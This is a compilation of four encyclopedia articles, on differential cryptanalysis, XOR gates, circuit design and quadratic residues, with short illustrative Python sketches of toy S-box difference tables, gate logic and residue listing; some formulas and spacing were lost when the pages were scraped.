Differential cryptanalysis is a general form of cryptanalysis applicable primarily to block ciphers, but also to stream ciphers and cryptographic hash functions. In the broadest sense, it is the study of how differences in information input can affect the resultant difference at the output. In the case of a block cipher, it refers to a set of techniques for tracing differences through the network of transformations, discovering where the cipher exhibits non-random behavior, and exploiting such properties to recover the secret (cryptographic) key.

The discovery of differential cryptanalysis is generally attributed to Eli Biham and Adi Shamir in the late 1980s, who published a number of attacks against various block ciphers and hash functions, including a theoretical weakness in the Data Encryption Standard (DES). It was noted by Biham and Shamir that DES was surprisingly resistant to differential cryptanalysis, but small modifications to the algorithm would make it much more susceptible.[1]: 8–9

In 1994, a member of the original IBM DES team, Don Coppersmith, published a paper stating that differential cryptanalysis was known to IBM as early as 1974, and that defending against differential cryptanalysis had been a design goal.[2] According to author Steven Levy, IBM had discovered differential cryptanalysis on its own, and the NSA was apparently well aware of the technique.[3] IBM kept some secrets, as Coppersmith explains: "After discussions with NSA, it was decided that disclosure of the design considerations would reveal the technique of differential cryptanalysis, a powerful technique that could be used against many ciphers. This in turn would weaken the competitive advantage the United States enjoyed over other countries in the field of cryptography."[2] Within IBM, differential cryptanalysis was known as the "T-attack"[2] or "Tickle attack".[4]

While DES was designed with resistance to differential cryptanalysis in mind, other contemporary ciphers proved to be vulnerable. An early target for the attack was the FEAL block cipher. The original proposed version with four rounds (FEAL-4) can be broken using only eight chosen plaintexts, and even a 31-round version of FEAL is susceptible to the attack. In contrast, differential cryptanalysis can successfully cryptanalyze DES only with an effort on the order of 2^47 chosen plaintexts.

Differential cryptanalysis is usually a chosen plaintext attack, meaning that the attacker must be able to obtain ciphertexts for some set of plaintexts of their choosing. There are, however, extensions that would allow a known plaintext or even a ciphertext-only attack. The basic method uses pairs of plaintexts related by a constant difference. Difference can be defined in several ways, but the eXclusive OR (XOR) operation is usual. The attacker then computes the differences of the corresponding ciphertexts, hoping to detect statistical patterns in their distribution. The resulting pair of differences is called a differential. Their statistical properties depend upon the nature of the S-boxes used for encryption, so the attacker analyses differentials (Δx, Δy), where Δy = S(x ⊕ Δx) ⊕ S(x) and ⊕ denotes exclusive or, for each such S-box S (a small worked example appears below). In the basic attack, one particular ciphertext difference is expected to be especially frequent. In this way, the cipher can be distinguished from random. More sophisticated variations allow the key to be recovered faster than an exhaustive search.
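As a small worked example, the Python sketch below tabulates, for a toy 4-bit S-box (an arbitrary permutation chosen here purely for illustration), how often each input difference leads to each output difference; the most biased entry is exactly the kind of non-random behavior a differential attack exploits:

```python
# Arbitrary 4-bit S-box (a permutation of 0..15), chosen only for illustration.
SBOX = [0x6, 0x4, 0xC, 0x5, 0x0, 0x7, 0x2, 0xE,
        0x1, 0xF, 0x3, 0xD, 0x8, 0xA, 0x9, 0xB]

def difference_table(sbox):
    """ddt[dx][dy] = number of inputs x with sbox[x ^ dx] ^ sbox[x] == dy."""
    n = len(sbox)
    ddt = [[0] * n for _ in range(n)]
    for dx in range(n):
        for x in range(n):
            ddt[dx][sbox[x ^ dx] ^ sbox[x]] += 1
    return ddt

ddt = difference_table(SBOX)
count, dx, dy = max((ddt[dx][dy], dx, dy)
                    for dx in range(1, 16) for dy in range(16))
print(f"most biased differential: {dx:#x} -> {dy:#x}, probability {count}/16")
```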
In the most basic form of key recovery through differential cryptanalysis, an attacker requests the ciphertexts for a large number of plaintext pairs, then assumes that the differential holds for at least r − 1 rounds, where r is the total number of rounds.[citation needed] The attacker then deduces which round keys (for the final round) are possible, assuming the difference between the blocks before the final round is fixed. When round keys are short, this can be achieved by simply exhaustively decrypting the ciphertext pairs one round with each possible round key. When one round key has been deemed a potential round key considerably more often than any other key, it is assumed to be the correct round key. For any particular cipher, the input difference must be carefully selected for the attack to be successful. An analysis of the algorithm's internals is undertaken; the standard method is to trace a path of highly probable differences through the various stages of encryption, termed a differential characteristic. Since differential cryptanalysis became public knowledge, it has become a basic concern of cipher designers. New designs are expected to be accompanied by evidence that the algorithm is resistant to this attack, and many, including the Advanced Encryption Standard, have been proven secure against the attack.[5] The attack relies primarily on the fact that a given input/output difference pattern only occurs for certain values of inputs. Usually the attack is applied in essence to the non-linear components as if they were a solid component (usually they are in fact look-up tables or S-boxes). Observing the desired output difference (between two chosen or known plaintext inputs) suggests possible key values. For example, if a differential of 1 ⇒ 1 (implying that a difference in the least significant bit (LSB) of the input leads to an output difference in the LSB) occurs with probability 4/256 (possible with the non-linear function in the AES cipher, for instance), then that differential is possible for only 4 values (or 2 pairs) of inputs. Suppose we have a non-linear function where the key is XORed before evaluation and the values that allow the differential are {2,3} and {4,5}. If the attacker sends in the values {6, 7} and observes the correct output difference, it means the key satisfies either 6 ⊕ K = 2 or 6 ⊕ K = 4, meaning the key K is either 2 or 4. In essence, to protect a cipher from the attack, for an n-bit non-linear function one would ideally seek a maximum differential probability as close to 2^−(n−1) as possible, in order to achieve differential uniformity. When this happens, the differential attack requires as much work to determine the key as simply brute-forcing the key.[6] The AES non-linear function has a maximum differential probability of 4/256 (most entries, however, are either 0 or 2). This means that in theory one could determine the key with half as much work as brute force; however, the high branch number of AES prevents any high-probability trails from existing over multiple rounds. In fact, the AES cipher would be just as immune to differential and linear attacks with a much weaker non-linear function. The incredibly high branch number (active S-box count) of 25 over 4 rounds means that over 8 rounds no attack involves fewer than 50 non-linear transforms, so the probability of success does not exceed Pr[attack] ≤ Pr[best attack on S-box]^50. For example, with the current S-box, AES emits no fixed differential with a probability higher than (4/256)^50, or 2^−300, which is far lower than the required threshold of 2^−128 for a 128-bit block cipher.
This would have allowed room for a more efficient S-box: even if it were 16-uniform, the probability of attack would still have been only 2^−200. No bijections with 2-uniformity exist for even-sized inputs/outputs. They do exist in odd-sized fields (such as GF(2^7)), using either cubing or inversion (other exponents can be used as well). For instance, S(x) = x^3 in any odd binary field is immune to differential and linear cryptanalysis. This is in part why the MISTY designs use 7- and 9-bit functions in their 16-bit non-linear function. What these functions gain in immunity to differential and linear attacks, they lose to algebraic attacks;[why?] that is, they can be described and solved via a SAT solver. This is in part why AES (for instance) has an affine mapping after the inversion.
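The key-recovery filtering described above can be sketched in a few lines. This is only a toy illustration under invented assumptions: the 3-bit S-box, the "cipher" (a single keyed S-box lookup), and the chosen plaintexts are made up, whereas a real attack would apply the same filtering to the last-round subkey of an actual cipher and over many plaintext pairs.

```python
# Toy illustration of filtering key candidates with a differential.
# The 3-bit S-box below is invented for the example; it is not from a real cipher.
SBOX = [3, 6, 1, 4, 7, 0, 5, 2]

def encrypt(x, k):
    # toy "cipher": XOR the key in, then apply the S-box once
    return SBOX[x ^ k]

secret_key = 5                      # unknown to the attacker in a real setting
p1, p2 = 6, 7                       # chosen plaintexts with input difference 1
c1, c2 = encrypt(p1, secret_key), encrypt(p2, secret_key)
observed_dy = c1 ^ c2

# The attacker keeps every key value that reproduces the observed output difference.
candidates = [k for k in range(8)
              if SBOX[p1 ^ k] ^ SBOX[p2 ^ k] == observed_dy]
print("keys consistent with the differential:", candidates)
```

Each additional plaintext pair following a high-probability differential shrinks the candidate set further, until one round-key value stands out as described above.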
https://en.wikipedia.org/wiki/Differential_cryptanalysis
XOR gate(sometimesEOR, orEXORand pronounced asExclusive OR) is a digitallogic gatethat gives a true (1 or HIGH) output when the number of true inputs is odd. An XOR gate implements anexclusive or(↮{\displaystyle \nleftrightarrow }) frommathematical logic; that is, a true output results if one, and only one, of the inputs to the gate is true. If both inputs are false (0/LOW) or both are true, a false output results. XOR represents the inequality function, i.e., the output is true if the inputs are not alike otherwise the output is false. A way to remember XOR is "must have one or the other but not both". An XOR gate may serve as a "programmable inverter" in which one input determines whether to invert the other input, or to simply pass it along with no change. Hence it functions as ainverter(a NOT gate) which may be activated or deactivated by a switch.[1][2] XOR can also be viewed as additionmodulo2. As a result, XOR gates are used to implement binary addition in computers. Ahalf adderconsists of an XOR gate and anAND gate. The gate is also used insubtractorsandcomparators.[3] Thealgebraic expressionsA⋅B¯+A¯⋅B{\displaystyle A\cdot {\overline {B}}+{\overline {A}}\cdot B}or(A+B)⋅(A¯+B¯){\displaystyle (A+B)\cdot ({\overline {A}}+{\overline {B}})}or(A+B)⋅(A⋅B)¯{\displaystyle (A+B)\cdot {\overline {(A\cdot B)}}}orA⊕B{\displaystyle A\oplus B}all represent the XOR gate with inputsAandB. The behavior of XOR is summarized in thetruth tableshown on the right. There are three schematic symbols for XOR gates: the traditional ANSI and DIN symbols and theIECsymbol. In some cases, the DIN symbol is used with ⊕ instead of ≢. For more information seeLogic Gate Symbols. The "=1" on the IEC symbol indicates that the output is activated by only one active input. Thelogic symbols⊕,Jpq, and ⊻ can be used to denote an XOR operation in algebraic expressions. C-like languagesuse thecaretsymbol^to denote bitwise XOR. (Note that the caret does not denotelogical conjunction(AND) in these languages, despite the similarity of symbol.) The XOR gate is most commonly implemented usingMOSFETscircuits. Some of those implementations include: XOR gates can be implemented using AND-OR-Invert (AOI) or OR-AND-Invert (OAI) logic.[4] The metal–oxide–semiconductor (CMOS) implementations of the XOR gate corresponding to the AOI logic above are shown below. On the left, thenMOSandpMOStransistors are arranged so that the input pairsA⋅B¯{\displaystyle A\cdot {\overline {B}}}andA¯⋅B{\displaystyle {\overline {A}}\cdot B}activate the 2 pMOS transistors of the top left or the 2 pMOS transistors of the top right respectively, connecting Vdd to the output for a logic high. The remaining input pairsA⋅B{\displaystyle A\cdot B}andA¯⋅B¯{\displaystyle {\overline {A}}\cdot {\overline {B}}}activate each one of the two nMOS paths in the bottom to Vss for a logic low.[5] If inverted inputs (for example from aflip-flop) are available, this gate can be used directly. Otherwise, two additional inverters with two transistors each are needed to generateA¯{\displaystyle {\overline {A}}}andB¯{\displaystyle {\overline {B}}}, bringing the total number of transistors to twelve. The AOI implementation without inverted input has been used, for example, in theIntel 386CPU.[6] The XOR gate can also be implemented through the use oftransmission gateswithpass transistor logic. 
This implementation uses two Transmission gates and two inverters not shown in the diagram to generateA¯{\displaystyle {\overline {A}}}andB¯{\displaystyle {\overline {B}}}for a total of eight transistors, four less than in the previous design. The XOR function is implemented by passing through to the output the inverted value of A when B is high and passing the value of A when B is at a logic low. so when both inputs are low the transmission gate at the bottom is off and the one at the top is on and lets A through which is low so the output is low. When both are high only the one at the bottom is active and lets the inverted value of A through and since A is high the output will again be low. Similarly if B stays high but A is low the output would beA¯{\displaystyle {\overline {A}}}which is high as expected and if B is low but A is high the value of A passes through and the output is high completing the truth table for the XOR gate.[7] The trade-off with the previous implementation is that since transmission gates are not ideal switches, there is resistance associated with them, so depending on the signal strength of the input, cascading them may degrade the output levels.[8] The previous transmission gate implementation can be further optimized from eight to six transistors by implementing the functionality of the inverter that generatesA¯{\displaystyle {\overline {A}}}and the bottom pass-gate with just two transistors arranged like an inverter but with the source of the pMOS connected toB{\displaystyle B}instead ofVddand the source of the nMOS connected toB¯{\displaystyle {\overline {B}}}instead of GND.[8] The two leftmost transistors mentioned above, perform an optimized conditional inversion of A when B is at a logic high using pass transistor logic to reduce the transistor count and when B is at a logic low, their output is at a high impedance state. The two in the middle are atransmission gatethat drives the output to the value of A when B is at a logic low and the two rightmost transistors form an inverter needed to generateB¯{\displaystyle {\overline {B}}}used by the transmission gate and the pass transistor logic circuit.[9] As with the previous implementation, the direct connection of the inputs to the outputs through the pass gate transistors or through the two leftmost transistors, should be taken into account, especially when cascading them.</ref> Replacing the second NOR with a normalOR Gatewill create anXNOR Gate.[8] If a specific type of gate is not available, a circuit that implements the same function can be constructed from other available gates. A circuit implementing an XOR function can be trivially constructed from anXNOR gatefollowed by aNOT gate. If we consider the expression(A⋅B¯)+(A¯⋅B){\displaystyle (A\cdot {\overline {B}})+({\overline {A}}\cdot B)}, we can construct an XOR gate circuit directly using AND, OR andNOT gates. However, this approach requires five gates of three different kinds. As alternative, if different gates are available we can applyBoolean algebrato transform(A⋅B¯)+(A¯⋅B)≡(A+B)⋅(A¯+B¯){\displaystyle (A\cdot {\overline {B}})+({\overline {A}}\cdot B)\equiv (A+B)\cdot ({\overline {A}}+{\overline {B}})}as stated above, and applyde Morgan's lawto the last term to get(A+B)⋅(A⋅B)¯{\displaystyle (A+B)\cdot {\overline {(A\cdot B)}}}which can be implemented using only four gates as shown on the right. intuitively, XOR is equivalent to OR except for when both A and B are high. 
So the AND of the OR with then NAND that gives a low only when both A and B are high is equivalent to the XOR. An XOR gate circuit can be made from fourNAND gates. In fact, both NAND andNOR gatesare so-called "universal gates" and any logical function can be constructed from eitherNAND logicorNOR logicalone. If the fourNAND gatesare replaced byNOR gates, this results in anXNOR gate, which can be converted to an XOR gate by inverting the output or one of the inputs (e.g. with a fifthNOR gate). An alternative arrangement is of fiveNOR gatesin a topology that emphasizes the construction of the function from(A+B)⋅(A¯+B¯){\displaystyle (A+B)\cdot ({\overline {A}}+{\overline {B}})}, noting fromde Morgan's Lawthat aNOR gateis an inverted-inputAND gate. Another alternative arrangement is of fiveNAND gatesin a topology that emphasizes the construction of the function from(A⋅B¯)+(A¯⋅B){\displaystyle (A\cdot {\overline {B}})+({\overline {A}}\cdot B)}, noting fromde Morgan's Lawthat aNAND gateis an inverted-inputOR gate. For the NAND constructions, the upper arrangement requires fewer gates. For the NOR constructions, the lower arrangement offers the advantage of a shorter propagation delay (the time delay between an input changing and the output changing). XOR chips are readily available. The most common standard chip codes are: Literal interpretation of the name "exclusive or", or observation of the IEC rectangular symbol, raises the question of correct behaviour with additional inputs.[12]If a logic gate were to accept three or more inputs and produce a true output if exactly one of those inputs were true, then it would in effect be aone-hotdetector (and indeed this is the case for only two inputs). However, it is rarely implemented this way in practice. It is most common to regard subsequent inputs as being applied through a cascade of binary exclusive-or operations: the first two signals are fed into an XOR gate, then the output of that gate is fed into a second XOR gate together with the third signal, and so on for any remaining signals. The result is a circuit that outputs a 1 when the number of 1s at its inputs is odd, and a 0 when the number of incoming 1s is even. This makes it practically useful as aparity generatoror a modulo-2adder. For example, the74LVC1G386microchip is advertised as a three-input logic gate, and implements a parity generator.[13] XOR gates and AND gates are the two most-used structures inVLSIapplications.[14] The XOR logic gate can be used as a one-bitadderthat adds any two bits together to output one bit. For example, if we add1plus1inbinary, we expect a two-bit answer,10(i.e.2in decimal). Since the trailingsumbit in this output is achieved with XOR, the precedingcarrybit is calculated with anAND gate. This is the main principle inHalf Adders. A slightly largerFull Addercircuit may be chained together in order to add longer binary numbers. In certain situations, the inputs to an OR gate (for example, in a full-adder) or to an XOR gate can never be both 1's. As this is the only combination for which the OR and XOR gate outputs differ, anOR gatemay be replaced by an XOR gate (or vice versa) without altering the resulting logic. This is convenient if the circuit is being implemented using simple integrated circuit chips which contain only one gate type per chip. Pseudo-random number (PRN) generators, specificallylinear-feedback shift registers(LFSR), are defined in terms of the exclusive-or operation. 
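As a quick sanity check of the constructions just described, the short sketch below (Python used purely as a truth-table calculator) builds XOR from four NAND gates, uses XOR and AND as a half adder, and cascades two-input XORs to get the odd-parity behaviour of a multi-input gate.

```python
from functools import reduce

def nand(a, b):
    return 1 - (a & b)

def xor_from_nands(a, b):
    # the classic four-NAND construction of XOR
    m = nand(a, b)
    return nand(nand(a, m), nand(b, m))

def half_adder(a, b):
    # sum bit is XOR, carry bit is AND
    return a ^ b, a & b

def multi_xor(bits):
    # cascaded two-input XORs: output is 1 iff an odd number of inputs are 1
    return reduce(lambda x, y: x ^ y, bits, 0)

for a in (0, 1):
    for b in (0, 1):
        assert xor_from_nands(a, b) == a ^ b
        print(a, b, "xor:", a ^ b, "half adder (sum, carry):", half_adder(a, b))

print(multi_xor([1, 1, 1]))  # 1 -> odd number of ones (parity-generator behaviour)
```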
A suitable arrangement of XOR gates can therefore model a linear-feedback shift register, in order to generate random numbers. XOR gates may also be used in the simplest phase detectors.[15]: 425 An XOR gate may be used to easily change between buffering or inverting a signal. For example, XOR gates can be added to the output of a seven-segment display decoder circuit to allow a user to choose between active-low or active-high output. XOR gates produce a 0 when both inputs match. When searching for a specific bit pattern or PRN sequence in a very long data sequence, a series of XOR gates can be used to compare a string of bits from the data sequence against the target sequence in parallel. The number of 0 outputs can then be counted to determine how well the data sequence matches the target sequence. Correlators are used in many communications devices such as CDMA receivers and decoders for error correction and channel codes. In a CDMA receiver, correlators are used to extract the polarity of a specific PRN sequence out of a combined collection of PRN sequences. A correlator looking for 11010 in the data sequence 1110100101 would compare the incoming data bits against the target sequence at every possible offset while counting the number of matches (zeros). In this example, the best match occurs when the target sequence is offset by 1 bit and all five bits match. When offset by 5 bits, the sequence exactly matches its inverse. By looking at the difference between the number of ones and zeros that come out of the bank of XOR gates, it is easy to see where the sequence occurs and whether or not it is inverted. Longer sequences are easier to detect than short sequences. The function f(a, b) = a + b − 2ab is an analytical representation of the XOR gate; f(a, b) = |a − b| is an alternative analytical representation.
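The correlator example above can be reproduced directly. This minimal sketch slides the five-bit target across the data stream, XORs the aligned bits, and counts the zeros (matches); it also checks the two analytical representations of XOR given above on all four input combinations.

```python
data   = [1, 1, 1, 0, 1, 0, 0, 1, 0, 1]   # the data sequence 1110100101
target = [1, 1, 0, 1, 0]                  # the PRN sequence being searched for

for offset in range(len(data) - len(target) + 1):
    window = data[offset:offset + len(target)]
    # an XOR gate outputs 0 on a match, so count the zeros
    matches = sum(1 - (d ^ t) for d, t in zip(window, target))
    print("offset", offset, "matches", matches)
# offset 1 gives 5 matches (the sequence itself); offset 5 gives 0 (its inverse)

for a in (0, 1):
    for b in (0, 1):
        assert a ^ b == a + b - 2 * a * b == abs(a - b)
```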
https://en.wikipedia.org/wiki/XOR_gate
InElectrical Engineering, the process ofcircuit designcan cover systems ranging from complexelectronicsystems down to the individualtransistorswithin anintegrated circuit. One person can often do thedesign processwithout needing a planned or structured design process for simple circuits. Still, teams of designers following a systematic approach with intelligently guidedcomputer simulationare becoming increasingly common for more complex designs. In integrated circuitdesign automation, the term "circuit design" often refers to the step of the design cycle which outputs theschematicsof the integrated circuit. Typically this is the step betweenlogic designandphysical design.[1] Traditional circuit design usually involves several stages. Sometimes, adesign specificationis written after liaising with the customer. Atechnical proposalmay be written to meet the requirements of the customer specification. The next stage involvessynthesisingon paper aschematiccircuit diagram, an abstract electrical or electronic circuit that will meet the specifications. A calculation of the component values to meet the operating specifications under specified conditions should be made. Simulations may be performed toverifythe correctness of the design. Abreadboardor other prototype version of the design for testing against specification may be built. It may involve making any alterations to the circuit to achieve compliance. A choice as to a method of construction and all the parts and materials to be used must be made. There is a presentation of component and layout information to draughtspersons and layout and mechanical engineers for prototype production. This is followed by the testing or type-testing several prototypes to ensure compliance with customer requirements. Usually, there is a signing and approval of the final manufacturing drawings, and there may be post-design services (obsolescenceof components, etc.). The process of circuit design begins with thespecification, which states the functionality that the finished design must provide but does not indicate how it is to be achieved .[2]The initial specification is a technically detailed description of what the customer wants the finished circuit to achieve and can include a variety ofelectrical requirements, such as what signals the circuit will receive, what signals it must output, what power supplies are available and how much power it is permitted to consume. The specification can (and normally does) also set some of the physical parameters that the design must meet, such as size, weight,moisture resistance, temperature range, thermal output, vibration tolerance, and acceleration tolerance.[3] As the design process progresses, the designer(s) will frequently return to the specification and alter it to take account of the progress of the design. This can involve tightening specifications that the customer has supplied and adding tests that the circuit must pass to be accepted. These additional specifications will often be used in the verification of a design. Changes that conflict with or modify the customer's original specifications will almost always have to be approved by the customer before they can be acted upon. Correctly identifying the customer needs can avoid a condition known as 'design creep', which occurs in the absence of realistic initial expectations, and later by failing to communicate fully with the client during the design process. 
It can be defined in terms of its results; "at one extreme is a circuit with more functionality than necessary, and at the other is a circuit having an incorrect functionality".[4][who?]Nevertheless, some changes can be expected. It is good practice to keep options open for as long as possible because it's easier to remove spare elements from the circuit later on than it is to put them in. The design process involves moving from the specification at the start to a plan that contains all the information needed to be physically constructed at the end; this happens typically by passing through several stages, although in the straightforward circuit, it may be done in a single step.[5]The process usually begins with the conversion of the specification into ablock diagramof the various functions that the circuit must perform, at this stage the contents of each block are not considered, only what each block must do, this is sometimes referred to as a "black box" design. This approach allows the possibly highly complex task to be broken into smaller tasks either by tackled in sequence or divided amongst members of a design team. Each block is then considered in more detail, still at an abstract stage, but with a lot more focus on the details of the electrical functions to be provided. At this or later stages, it is common to require a large amount of research ormathematical modelinginto what is and is not feasible to achieve.[6]The results of this research may be fed back into earlier stages of the design process, for example if it turns out one of the blocks cannot be designed within the parameters set for it, it may be necessary to alter other blocks instead. At this point, it is also common to start considering both how to demonstrate that the design does meet the specifications, and how it is to be tested ( which can includeself diagnostictools ).[7] Finally, the individual circuitcomponentsare chosen to carry out each function in the overall design; at this stage, the physical layout and electrical connections of each component are also decided, this layout commonly taking the form of artwork for the production of aprinted circuit boardor Integrated circuit. This stage is typically highly time-consuming because of the vast array of choices available. A practical constraint on the design at this stage is standardization;. At the same time, a certain value of a component may be calculated for use in some location in a circuit; if that value cannot be purchased from a supplier, then the problem has still not been solved. To avoid this, a certain amount of 'catalog engineering' can be applied to solve the more mundane tasks within an overall design. In general, the circuit principles of design flow are including but not limited to architecture scope definition, materials selection, schematic capture, PCB layout design that include power and signal integrity considition, test and validation.[8] Generally, the cost of designing circuits is directly tied to the final circuits' complexity. The greater the complexity (quantity of components and design novelty), the more hours of a skilled engineer's time will be necessary to create a functional product. The process can be tedious, as minute details or features could take any amount of time, materials and manpower to create. 
For example, accounting for the effects of modifying transistor sizes or codecs can itself be time-consuming.[9] In the world of flexible electronics, replacing the widely used polyimide substrates with materials like PEN or PET could reduce costs by factors of 5-10.[10] Costs for designing a circuit are almost always far higher than production costs per unit, as the cost of production and the function of the circuit depend greatly on the design of the circuit.[11] Although typical PCB production methods involve subtractive manufacturing, there are methods that use an additive manufacturing process, such as using a 3D printer to "print" a PCB. This method is thought to cost less than subtractive manufacturing and eliminates the need for waste management altogether.[12] Once a circuit has been designed, it must be both verified and tested. Verification is the process of going through each stage of a design and ensuring that it will do what the specification requires it to do. This is frequently a highly mathematical process and can involve large-scale computer simulations of the design. In any complicated design, it is very likely that problems will be found at this stage, which may require a large amount of the design work to be redone in order to fix them. Testing is the real-world counterpart to verification; testing involves physically building at least a prototype of the design and then (in combination with the test procedures in the specification or added to it) checking that the circuit does what it was designed to do. For example, in the Visual DSD software, the logic circuit of a complement circuit can be implemented by compiling program code,[13] and functional simulations of architectures modeled in VHDL can be used to verify that proposed circuits realize the intended logic expressions. These are only two of many design tools that help designers plan their circuits for production and can make the resulting circuits cheaper and more efficient.[14] Prototyping plays a significant role in the complex process of circuit design. This iterative process involves continuous refinement and correction of errors. The task of circuit design is demanding and requires meticulous attention to detail to avoid errors. Circuit designers are required to conduct multiple tests to ensure the efficiency and safety of their designs before they are deemed suitable for consumer use.[15] Prototyping is an integral part of electrical work due to its precise and meticulous nature. The absence of prototyping could potentially lead to errors in the final product. Circuit designers, who are compensated for their expertise in creating electrical circuits, bear the responsibility of ensuring the safety of consumers who purchase and use these circuits. The risks of neglecting the prototyping process and releasing a flawed electrical circuit are significant: they include fires and overheated wires, which could result in burns or severe injuries.[15] An electrical circuit design typically starts in a circuit board simulator, which shows how the parts will be put together and how the circuit will behave, virtually.[16] A blueprint is the drawing of the technical design and final product.
After all of this is done, the blueprint is used to assemble the finished circuit, which may power anything from a household vacuum cleaner to a large cinema display. Producing such designs takes time and a level of skill that not everyone can acquire, yet electrical circuits underpin most of the things we rely on in everyday life. Any commercial design will normally also include an element of documentation; the precise nature of this documentation will vary according to the size and complexity of the circuit and the country in which it is to be used. As a bare minimum, the documentation will normally include at least the specification and testing procedures for the design and a statement of compliance with current regulations. In the EU, this last item will normally take the form of a CE Declaration listing the European directives complied with and naming an individual responsible for compliance.[17]
https://en.wikipedia.org/wiki/Circuit_design
Innumber theory, anintegerqis aquadratic residuemodulonif it iscongruentto aperfect squaremodulon; that is, if there exists an integerxsuch that Otherwise,qis aquadratic nonresiduemodulon. Quadratic residues are used in applications ranging fromacoustical engineeringtocryptographyand thefactoring of large numbers. Fermat,Euler,Lagrange,Legendre, and other number theorists of the 17th and 18th centuries established theorems[1]and formed conjectures[2]about quadratic residues, but the first systematic treatment is § IV ofGauss'sDisquisitiones Arithmeticae(1801). Article 95 introduces the terminology "quadratic residue" and "quadratic nonresidue", and says that if the context makes it clear, the adjective "quadratic" may be dropped. For a givenn, a list of the quadratic residues modulonmay be obtained by simply squaring all the numbers 0, 1, ...,n− 1. Sincea≡b(modn) impliesa2≡b2(modn), any other quadratic residue is congruent (modn) to some in the obtained list. But the obtained list is not composed of mutually incongruent quadratic residues (mod n) only. Sincea2≡(n−a)2(modn), the list obtained by squaring all numbers in the list 1, 2, ...,n− 1(or in the list 0, 1, ...,n) is symmetric (modn) around its midpoint, hence it is actually only needed to square all the numbers in the list 0, 1, ...,⌊{\displaystyle \lfloor }n/2⌋{\displaystyle \rfloor }. The list so obtained may still contain mutually congruent numbers (modn). Thus, the number of mutually noncongruent quadratic residues moduloncannot exceedn/2 + 1 (neven) or (n+ 1)/2 (nodd).[3] The product of two residues is always a residue. Modulo 2, every integer is a quadratic residue. Modulo an oddprime numberpthere are (p+ 1)/2 residues (including 0) and (p− 1)/2 nonresidues, byEuler's criterion. In this case, it is customary to consider 0 as a special case and work within themultiplicative group of nonzero elementsof thefield(Z/pZ){\displaystyle (\mathbb {Z} /p\mathbb {Z} )}. In other words, every congruence class except zero modulophas a multiplicative inverse. This is not true for composite moduli.[4] Following this convention, the multiplicative inverse of a residue is a residue, and the inverse of a nonresidue is a nonresidue.[5] Following this convention, modulo an odd prime number there is an equal number of residues and nonresidues.[4] Modulo a prime, the product of two nonresidues is a residue and the product of a nonresidue and a (nonzero) residue is a nonresidue.[5] The first supplement[6]to thelaw of quadratic reciprocityis that ifp≡ 1 (mod 4) then −1 is a quadratic residue modulop, and ifp≡ 3 (mod 4) then −1 is a nonresidue modulop. This implies the following: Ifp≡ 1 (mod 4) the negative of a residue modulopis a residue and the negative of a nonresidue is a nonresidue. Ifp≡ 3 (mod 4) the negative of a residue modulopis a nonresidue and the negative of a nonresidue is a residue. All odd squares are ≡ 1 (mod 8) and thus also ≡ 1 (mod 4). Ifais an odd number andm= 8, 16, or some higher power of 2, thenais a residue modulomif and only ifa≡ 1 (mod 8).[7] For example, mod (32) the odd squares are and the even ones are So a nonzero number is a residue mod 8, 16, etc., if and only if it is of the form 4k(8n+ 1). A numberarelatively prime to an odd primepis a residue modulo any power ofpif and only if it is a residue modulop.[8] If the modulus ispn, Notice that the rules are different for powers of two and powers of odd primes. 
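The procedure described above for listing quadratic residues can be written out directly. As a minimal sketch, squaring only 0 through ⌊n/2⌋ suffices, because a and n − a have the same square modulo n.

```python
def quadratic_residues(n):
    # squares of 0..n//2 cover every residue class, since a^2 ≡ (n-a)^2 (mod n)
    return sorted({(x * x) % n for x in range(n // 2 + 1)})

print(quadratic_residues(11))  # [0, 1, 3, 4, 5, 9]
print(quadratic_residues(15))  # [0, 1, 4, 6, 9, 10]
```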
Modulo an odd prime powern=pk, the products of residues and nonresidues relatively prime topobey the same rules as they do modp;pis a nonresidue, and in general all the residues and nonresidues obey the same rules, except that the products will be zero if the power ofpin the product ≥n. Modulo 8, the product of the nonresidues 3 and 5 is the nonresidue 7, and likewise for permutations of 3, 5 and 7. In fact, the multiplicative group of the non-residues and 1 form theKlein four-group. The basic fact in this case is Modulo a composite number, the product of two residues is a residue. The product of a residue and a nonresidue may be a residue, a nonresidue, or zero. For example, from the table for modulus 61, 2,3,4, 5 (residues inbold). The product of the residue 3 and the nonresidue 5 is the residue 3, whereas the product of the residue 4 and the nonresidue 2 is the nonresidue 2. Also, the product of two nonresidues may be either a residue, a nonresidue, or zero. For example, from the table for modulus 151, 2, 3,4, 5,6, 7, 8,9,10, 11, 12, 13, 14 (residues inbold). The product of the nonresidues 2 and 8 is the residue 1, whereas the product of the nonresidues 2 and 7 is the nonresidue 14. This phenomenon can best be described using the vocabulary of abstract algebra. The congruence classes relatively prime to the modulus are agroupunder multiplication, called thegroup of unitsof thering(Z/nZ){\displaystyle (\mathbb {Z} /n\mathbb {Z} )}, and the squares are asubgroupof it. Different nonresidues may belong to differentcosets, and there is no simple rule that predicts which one their product will be in. Modulo a prime, there is only the subgroup of squares and a single coset. The fact that, e.g., modulo 15 the product of the nonresidues 3 and 5, or of the nonresidue 5 and the residue 9, or the two residues 9 and 10 are all zero comes from working in the full ring(Z/nZ){\displaystyle (\mathbb {Z} /n\mathbb {Z} )}, which haszero divisorsfor compositen. For this reason some authors[10]add to the definition that a quadratic residueamust not only be a square but must also berelatively primeto the modulusn. (ais coprime tonif and only ifa2is coprime ton.) Although it makes things tidier, this article does not insist that residues must be coprime to the modulus. Gauss[11]usedRandNto denote residuosity and non-residuosity, respectively; Although this notation is compact and convenient for some purposes,[12][13]a more useful notation is theLegendre symbol, also called thequadratic character, which is defined for all integersaand positive oddprime numberspas There are two reasons why numbers ≡ 0 (modp) are treated specially. As we have seen, it makes many formulas and theorems easier to state. The other (related) reason is that the quadratic character is ahomomorphismfrom themultiplicative group of nonzero congruence classes modulopto thecomplex numbersunder multiplication. 
